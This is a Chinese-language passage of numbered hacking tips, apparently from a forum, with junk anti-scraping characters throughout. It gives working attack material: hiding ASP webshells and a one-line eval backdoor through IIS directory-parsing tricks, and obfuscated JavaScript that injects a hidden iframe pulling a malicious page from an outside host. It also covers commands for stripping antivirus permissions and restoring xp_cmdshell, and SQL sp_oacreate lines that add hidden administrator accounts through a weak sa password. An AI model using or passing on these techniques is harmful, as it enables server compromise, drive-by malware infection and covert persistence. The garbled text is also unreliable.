拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp) M( u$ f3 X+ k# L, r' m( ]
通过web访问ASP木马:http://ip/images../news.asp?action=login
0 t4 J% D; k/ H* e如何删除非标准目录:rmdir images..\ /s7 D3 b! b3 E4 h# q5 s1 z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 A' M3 M$ {, m2 E* F9 r ]$ Ymkdir programme.asp
% z5 Y% c% N( z8 R$ D新建1.txt文件内容:<!--#include file=”12.jpg”-->
9 f/ m: F1 a1 `9 v& j1 V: L: k新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件; f2 g& |% A& O1 m" A# h7 O3 J
attrib +H +S programme.asp
: L4 x& W& u5 L; d- V通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
$ _1 C0 E# D' D2 T. v
1 r' }* A: T( I* P3 m' G& i. z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% @) O) a F: _' Q1 |7 X7 [% U
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。: r# o3 c4 Y' \; C2 ]% `% _
3 `/ G+ R; V) o/ v; T+ q. G
55、JS隐蔽挂马$ o$ ~1 U8 f# d6 w# X# M3 |
1.4 m7 f3 D- s0 V
var tr4c3="<iframe src=ht";0 J% W; q7 e( Q/ _
tr4c3 = tr4c3+"tp:/";
7 j3 s3 E% b* G- Ztr4c3 = tr4c3+"/ww";
$ C/ g$ {2 L6 i: Otr4c3 = tr4c3+"w.tr4";
: J) N& ]0 B2 w8 P5 ztr4c3 = tr4c3+"c3.com/inc/m";
5 ~" ^8 L; }4 y3 O! Atr4c3 = tr4c3+"m.htm style="display:none"></i";
2 @& C* ^: e4 L% ntr4c3 =tr4c3+"frame>'";2 X# ^5 F+ E# e9 I9 R
document.write(tr4c3);
9 X# Y$ e L- o避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。: z' G4 C' J2 Q6 c+ Z9 k9 K
7 f- y# N" O* b5 {: i8 \
2.
0 }2 \ p3 d- e7 u转换进制,然后用EVAL执行。如' h; P2 h) B" r! I, f
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
9 H t( R2 {1 h, K# t! d不过这个有点显眼。
, p1 F/ x9 C; q1 X: M; j2 s3 R( T3.4 m2 C4 h) t& k2 V, p7 h
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');4 l, D* q8 G! j6 F9 o
最后一点,别忘了把文件的时间也修改下。
2 ^& Q, R* ^! q1 ~/ U) W1 N1 b
. J: l# F+ B6 o( A3 K) I U1 I9 I) j56.3389终端入侵常用DOS命令* [) r( ]) r! i6 { V2 E1 j
taskkill taskkill /PID 1248 /t* t( L$ Z: F* l2 H
& ]& ]' a0 f1 v6 {
tasklist 查进程
( m% ?. @# r4 W4 M" U6 J/ Q
9 A1 {8 d' i' S6 vcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限7 _0 m% |, S6 A. O6 ]
iisreset /reboot/ h% B! G4 ]" D1 U: P
tsshutdn /reboot /delay:1 重起服务器
0 h9 ~8 c/ [; ?7 N
' n% ?7 b! v- tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,. }- A9 ~% ^6 R6 }
2 R- ?) B6 s) _5 e7 p. M1 U7 a$ uquery user 查看当前终端用户在线情况
0 U% y; P5 v0 N" ~' \
) @& ~6 ]4 S1 r& L: {/ k. R要显示有关所有会话使用的进程的信息,请键入:query process *
/ ]7 q# }: G. G5 S3 H( X& p4 d, v2 _# d/ {. M. u+ a( V
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2* Y! U/ }0 ?5 ?0 g. T0 v# R. l$ p
; ^: w) F0 Q3 a, l) J要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! @& i8 L5 N. \, `5 M5 g
5 e6 z% k8 X/ N; W9 }5 S要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02+ R7 n5 J! g* y. ~, z3 S- \
2 I5 q K$ _' t7 }+ ~- }命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启# p7 r* X9 D: a0 v
# i: y" Y1 K; w3 Q( b4 b% u
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
/ ] U" M1 w6 V( A" K" l m
( B/ y% a6 b" }8 y$ p命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ b% d2 [# r" W i
* p- ^1 R5 t* A( d, {9 b
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机) B) ~. Z8 l3 r1 f
" [" k# ?! T* L# a& s
56、在地址栏或按Ctrl+O,输入:& D/ J. F1 B' b7 G# L! Y+ R
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;5 Z' E: p, \6 G5 [
' O0 N1 F/ ?% b$ z. L源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 ~8 m" U+ P+ Y( k" Y
8 h1 L3 y8 K0 \57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# j, L. p; o! N, h用net localgroup administrators是可以看到管理组下,加了$的用户的。) O5 x4 o4 V) N. q P
1 C) b$ G/ U0 v* O% Z1 c58、 sa弱口令相关命令
# A* n) S2 N2 m3 i" m, ~4 J4 i; K' j1 b
一.更改sa口令方法:. C3 P$ w+ o' N/ l( E3 a# V# l( [
用sql综合利用工具连接后,执行命令:& B; c; R: x, r u0 m* Z
exec sp_password NULL,'20001001','sa'; [5 e/ k x$ `& ?1 B# F
(提示:慎用!)
; M+ Z! ~7 t1 o2 v) D# T: s, W8 F* b; [9 h& r& r& K
二.简单修补sa弱口令.& g7 Z) P6 t6 x6 C: i2 S0 {
' z) x: ]* t, c2 x; s7 Q+ L
方法1:查询分离器连接后执行:
7 x X0 Q1 ^- M2 e" Dif exists (select * from
- S9 g1 ~& P# x1 qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
0 ^( x# D1 i" xOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
% I4 h7 ^" ?" `5 `2 \* m( d5 r6 H, ~; K# y' ~2 A
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'+ i( E X" | I+ H
+ `1 \6 V4 M+ X3 W, N. @
GO5 g' R0 A- |) ? V" A
0 I5 T; R" x- M2 Q' R# t; K2 }1 _7 ~然后按F5键命令执行完毕! Z' }7 a _" M/ b0 o
9 ~* H* B3 E1 Z: P( c方法2:查询分离器连接后
5 k2 U, j& Y5 W' Q: b第一步执行:use master
. f5 H8 x$ b- i3 P0 ]第二步执行:sp_dropextendedproc 'xp_cmdshell'8 f+ L. r5 n* Z( I5 p
然后按F5键命令执行完毕
* _8 O1 q5 g" x+ q+ J3 B' d/ s1 H, b! m6 {8 p
! l' M. c3 B$ O* l三.常见情况恢复执行xp_cmdshell.
+ _2 v/ h& r& s; w G7 M' J1 T0 j0 E7 G- S( I; G* n( G
# y" q0 C# a& E7 T+ Y7 X" o
1 未能找到存储过程'master..xpcmdshell'.1 R4 u- ~- r2 u! }
恢复方法:查询分离器连接后,
' t( K, p6 V+ e2 @9 X8 H第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int T, u, V9 K. m; i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ B/ L# a% F$ G0 c f然后按F5键命令执行完毕
2 f) A3 t; T* F7 r! @7 b& B
7 c7 ?8 S1 D5 r( d u! k2 H1 h2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). A2 z( K4 W+ H; l
恢复方法:查询分离器连接后,9 d( t2 T6 E) h7 _4 w1 {9 p
第一步执行:sp_dropextendedproc "xp_cmdshell"# h& a1 h2 ~" |! M( S; s+ ~5 M1 A
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" `5 O* n" X4 ~" N6 Z, t
然后按F5键命令执行完毕% a8 X; N9 h f; B# {
`) N8 R4 m4 [4 g3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)5 r! g/ g( ?- B3 Z9 O+ F
恢复方法:查询分离器连接后,( ^9 E6 g: z; h6 B8 {" \, w
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
" E# M) X/ E5 @第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' $ h+ T( `' C) Y y: P
然后按F5键命令执行完毕
6 C* P; g1 t* J B' _& q
4 t+ l" a! x0 C四.终极方法.
" f: S Q8 c, `& E如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
" q8 z% X4 v3 K1 w1 Q0 G3 j5 `8 t查询分离器连接后,0 r/ Z T; {7 T& M9 S
2000servser系统:* C X; B" ]# X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 H& q; B) p: v5 J5 f. V+ n% g) N$ P. t1 u- s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ P. I, m4 g9 z: w X, S+ i
0 ^9 U, _1 s2 n/ ]3 z
xp或2003server系统:; `% g' S" y3 L2 `4 S5 C
( I: c% a6 Y8 N; `6 Z/ U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ R h3 h8 x2 H/ [, c. B8 G. Z" ?0 L+ Z+ Y' C: N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'! g2 ^7 D: @+ A5 F" i! f- m$ ~
|